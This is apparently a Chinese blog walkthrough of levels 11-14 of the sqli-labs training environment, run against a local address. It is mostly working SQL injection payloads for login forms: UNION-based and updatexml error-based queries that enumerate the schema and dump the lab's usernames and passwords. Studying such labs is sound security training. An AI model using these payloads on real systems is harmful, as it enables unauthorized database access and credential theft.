sqli-11-14关-2020-04-17

十一关

http://127.0.0.1/sqli/Less-11/

 看到这个页面,先填个admin,admin再说.

 什么情况,竟然出现这个结果.那么再乱填一个.

 

 明显不一样了.那么我还是抓包处理一下.

抓到包,我们可以尝试重发测试.

 看到数据库报错,第一时间想到这里有漏洞.

uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit  #得知有2列数

uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit  #得到数据库security

uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit  #得到数据表emails,referers,uagents,users

uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit  #得到数据表users的字段

user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit  #数据表users的username和password的数据

Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

第十二关

直接说怎么找注入点和闭合点

uname=xxeyuki'&passwd=33yuki&submit=Submit  #单引号没有任何反应

uname=xxeyuki"&passwd=33yuki&submit=Submit  #有反应了,很明显的数据库报错。

 ")这个闭合好像非常明显

uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit  #3报错,2没有报错 确定列数2

uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit  #得到数据库security

uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit  #数据表 users

uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit  #字段username,password

uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit  #用户名和密码数据

 十三关

uname=admin'&passwd=admin&submit=Submit  #看到弹出这个报错,我就大概确定闭合是')

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1

uname=admin') order by 2#&passwd=admin&submit=Submit  #确定列数为2

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit  #爆字段,无语只能17个字符

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #只能一个个爆了

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #密码字段

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #用户名

uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #密码

十四关

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  #爆数据库

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  #爆数据表

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  #爆用户名

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  #爆密码

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

  

原文地址:https://www.cnblogs.com/llcn/p/12717807.html